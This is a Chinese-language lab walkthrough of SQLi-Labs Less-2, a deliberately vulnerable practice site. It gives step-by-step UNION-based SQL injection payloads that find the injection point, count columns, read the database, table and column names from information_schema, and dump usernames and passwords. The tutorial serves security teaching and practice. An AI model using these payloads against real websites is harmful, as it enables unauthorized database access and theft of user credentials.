SQL注入--第二关详细讲解

SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令

SQL注入式攻击的主要形式有两种:

♦一是直接将代码插入到与SQL命令串联在一起并使得其以执行的用户输入变量。上面笔者举的例子就是采用了这种方法。由于其直接与SQL语句捆绑,故也被称为直接注入式攻击法。

♦二是一种间接的攻击方法,它将恶意代码注入要在表中存储或者作为原书据存储的字符串。在存储的字符串中会连接到一个动态的SQL命令中,以执行一些恶意的SQL代码。注入过程的工作方式是提前终止文本字符串,然后追加一个新的命令。

1.访问SQLi-Labs网站

在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为:

http://[靶机IP]/sqli-labs/Less-2/

(注意大小写)

登录后,根据网页提示,先给定一个GET参数,即:

http://[靶机IP]/sqli-labs/Less-2/?id=1

此时页面显示id=1的用户名Dump、密码Dump。

SQL注入--第二关详细讲解_第1张图片

2.寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型:

http://[靶机IP]/sqli-labs/Less-2/?id=1'

运行后报错!

SQL注入--第二关详细讲解_第2张图片

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=1

运行后正常显示!

SQL注入--第二关详细讲解_第3张图片

 

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2

运行后未正常显示!

SQL注入--第二关详细讲解_第4张图片

 

由上述结果可以判断,网站存在数字型注入点。

3.判断网站查询的字段数

尝试使用以下payload获取网站查询的字段数(关键字order by):

http://[靶机IP]/sqli-labs/Less-2/?id=1 order by 1--+ (--+表示语句结束)

正常显示!

SQL注入--第二关详细讲解_第5张图片

 

http://[靶机IP]/sqli-labs/Less-2/?id=1 order by 2--+

正常显示!

SQL注入--第二关详细讲解_第6张图片

 

http://[靶机IP]/sqli-labs/Less-2/?id=1 order by 3--+

正常显示!

SQL注入--第二关详细讲解_第7张图片

 

http://[靶机IP]/sqli-labs/Less-2/?id=1 order by 4--+

报错!

SQL注入--第二关详细讲解_第8张图片

 

由上述结果可以判断,网站查询的字段数为3。

4.判断网站的回显位置

利用以下payload判断网站的回显位置:and 1=2 sql语句攻击语句表示

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,3--+

执行的结果是:2号位和3号位可以回显!

SQL注入--第二关详细讲解_第9张图片

 

后面的步骤中,我们可以在2号位或3号位设置一些具有特殊功能的函数或命令来执行SQL注入!

5.获取网站当前所在数据库的库名

使用以下payload获取网站当前所在数据库的库名:

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,database()--+

显示结果为security。

SQL注入--第二关详细讲解_第10张图片

 

6.获取数据库security的全部表名

使用以下payload获取数据库security的全部表名:

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

SQL注入--第二关详细讲解_第11张图片

 

7.获取users表的全部字段名

使用以下payload获取users表的全部字段名: column 纵向查找,数据库列

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

显示结果,users表中有id、username和password三个字段。

SQL注入--第二关详细讲解_第12张图片

 

8.获取users表id、username和password字段的全部值。

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

(1)显示第1组数据 ws表示字段

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+

显示结果为Dump,Dump。

SQL注入--第二关详细讲解_第13张图片

 

(2)显示第2组数据

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1--+

显示结果为Angelina,I-kill-you。

SQL注入--第二关详细讲解_第14张图片

 

(3)显示第3组数据

http://[靶机IP]/sqli-labs/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 2,1--+

显示结果为Dummy,p@ssword。

SQL注入--第二关详细讲解_第15张图片

 

以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。
实验至此结束。

你可能感兴趣的:(安全,网络安全,sql,数据库)